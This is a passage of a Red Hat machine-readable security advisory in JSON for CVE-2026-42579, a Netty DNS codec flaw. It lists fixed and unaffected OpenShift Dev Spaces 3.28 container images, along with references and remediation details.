"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477217"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. Netty\u0027s DNS (Domain Name System) codec does not properly enforce domain name constraints as defined in RFC 1035 during both encoding and decoding processes. This vulnerability allows a remote attacker to exploit the decoder using malicious DNS responses or exploit the encoder through user-influenced hostnames, leading to a high integrity impact on the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: Netty: High integrity impact due to improper DNS domain name constraint enforcement",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important integrity flaw in Netty\u0027s DNS codec. The vulnerability arises from insufficient enforcement of RFC 1035 domain name constraints during both encoding and decoding, allowing remote attackers to manipulate DNS responses or user-controlled hostnames. This could lead to a high integrity impact on affected Red Hat products that utilize the vulnerable Netty DNS codec.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42579"
},
{
"category": "external",
"summary": "RHBZ#2477217",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477217"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42579",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42579"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42579",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42579"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-cm33-6792-r9fm",
"url": "https://github.com/netty/netty/security/advisories/GHSA-cm33-6792-r9fm"
}
],
"release_date": "2026-05-13T18:01:52.500000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T19:42:14+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25123"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
